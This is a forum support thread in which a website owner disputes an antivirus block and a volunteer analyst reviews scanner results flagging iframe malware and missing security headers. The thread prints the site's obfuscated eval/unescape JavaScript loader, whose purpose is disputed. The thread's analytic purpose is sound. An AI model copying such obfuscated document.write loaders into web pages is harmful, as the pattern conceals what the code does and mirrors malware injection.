website blocked [flyff-atomix.com]

Hello everyone, I have a problem with your antivirus.
I did an analysis of my website http://www.flyff-atomix.com
on virustotal.com, here: https://www.virustotal.com/fr/url/8f4bb7bfbff30c698d0aa2eb719d096386fceea691b54a4e173ffc9696ae913a/analysis/1418460443/

The problem is that my site is blocked because I used an encoding system to protect access to certain images to prevent them being copied me.

The code is a false positive

[[<script type='text/javascript' language='javascript' > 
 
<!-- 
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%76%64%35%65%32%37%34%65%28%73%29%20%7b
%09%76%61%72%20%72%20%3d%20%22%22%3b
%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%32%38%34%38%38%30%31%22%29%3b
%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b
%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%33%35%37%32%33%22%29%3b
%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b
%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%32%29%3b
%09%7d
%09%72%65%74%75%72%6e%20%72%3b
%7d
'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%76%64%35%65%32%37%34%65%28%27') + '%38%62%6a%7b%24%60%68%64%76%70%38%26%69%61%67%67%64%72%21%46%39%65%6e%7f%20%66%68%67%74%76%39%21%68%76%6a%74%62%69%77%63%6a%66%27%46%3b%37%61%68%7d%47%3c%65%6d%7c%23%66%68%66%73%72%3c%21%69%73%6a%77%61%6a%77%63%6b%61%33%27%45%39%61%21%6c%70%66%6b%39%21%37%23%43%3b%6c%6d%6a%24%71%75%66%39%21%37%6c%6c%66%6e%65%76%37%76%6a%79%61%6b%67%7f%68%63%60%32%6a%6d%6c%25%21%63%6b%65%72%76%3a%23%68%64%65%62%66%77%29%6b%6d%60%73%21%36%42%3d%37%67%41%3d%37%63%6d%7f%43%3b%36%64%68%7e%4422848801%36%34%31%33%36%35%36' + unescape('%27%29%29%3b'));
 
 
 </script>]]

So I decided to disable the encoding, which gives:

<div class="header">
<div class="logocircle"></div><div class="logocircle2"><a href="/"><img src="/images/pixel_vide.gif" class="header-lien"></a></div>
</div>

Sincerely, John
I wish you could upgrade your database to resolve this issue as quickly

The code is a false positive
Yea .....we always hear that ;)

Virustotal does not scan the site for malware, it is just a check against blacklists

Sucuri report http://sitecheck.sucuri.net/results/www.flyff-atomix.com

Malware entry: MW:IFRAME:HD28 http://labs.sucuri.net/db/malware/malware-entry-mwiframehd28

If you think this is wrong, report it to avast lab here www.support.avast.com

The code there is flagged in the browser as a malformed or illegal request attack code, also resembles XSS attack.
Google produces a 400 error.
An Injection check produces: Suspicious Text before HTML

*, *:hover{cursor: url("/images/curseur.png"), auto;} a:hover{cursor: url("/images/curseur/curseurbleu.png"), pointer;}

Excessive header info proliferation alert for apache/2.4.9 (win64) php/5.5.12
PHP 5.5.12 suffers from a memory corruption vulnerability.

Site is flagged by Bitdefender’s TrafficLight as malcious.
Sucuri gives 6 instances of iFrame malware - MW:IFRAME:HD28 (for analogue detection issue → https://forum.avast.com/index.php? topic=127154.10 )
Quote from Alain Purcaru on error: undefined function vd5e274e → http://jsunpack.jeek.org/?report=7c15bf2c1e70c8b19bd754e2a81d55539b341547
(open link with NoScript extension active and inside a VM/sandbox, for security research only)

Although PHP does not require variable declaration, it does recommend it in order to avoid some security vulnerabilities or bugs where one would forget to give a value to a variable that he will use later in the script. What PHP does in the case of undeclared variables is issue a very low level error, E_NOTICE, one that is not even reported by default,

XSS vuln: Results from scanning URL: htxp://www.flyff-atomix.com/javascript/javascript.js
Number of sources found: 41
Number of sinks found: 17

Your code

 div class="header"> <div class="logocircle"></div><div class="logocircle2"><a href="/"><img src="/images/pixel_vide.gif" class="header-lien"></a></div> </div> 

still gives alerts by malware Script Detector as XSS attack code related.

polonus

@legiux,

You should be a bit aware of your coding especially while with your hosting you are not as secure as “Fort Knox”
so to say as far as the header configuration there shows.
Result Category Name Actual Value Our Recommendation Show All Details
Missing Framing X-Frame-Options Use ‘sameorigin’
Missing Transport Strict-Transport-Security Use ‘max-age=31536000; includeSubDomains’
Missing Content X-Content-Type-Options Use ‘nosniff’
Correct Content Content-Type text/html; charset=UTF-8 Use ‘text/html;charset=utf-8’
Missing XSS X-XSS-Protection Use ‘1; mode=block’
Warning Cookies Set-Cookie PHPSESSID=3h6eucsn3j…3dd6plv7lc05; path=/ Add ‘secure; httponly;’
Correct Caching Cache-Control no-store, no-cache, …check=0, pre-check=0 Use ‘no-cache, no-store, must-revalidate’
Correct Caching Pragma no-cache Use ‘no-cache’
Correct Caching Expires Thu, 19 Nov 1981 08:52:00 GMT Use ‘-1’. Currently, expiration is current time minus -1043473382 seconds.
Missing Access Control X-Permitted-Cross-Domain-Policies Use ‘master-only’
Missing Content Security Policy Content-Security-Policy Try Content-Security-Policy-Report-Only to start. Include default-src ‘self’, avoid ‘unsafe-inline’ and ‘unsafe-eval’
Warning Server Information Server Apache/2.4.9 (Win64) PHP/5.5.12 Avoid version numbers
Warning Server Information X-Powered-By PHP/5.5.12 Avoid header

Well that up with those that host the server this site is on - for recommendations see details here: http://cyh.herokuapp.com/cyh
where the 3rd party scan came from.

polonus
(volunteer website analyst and website error-hunter)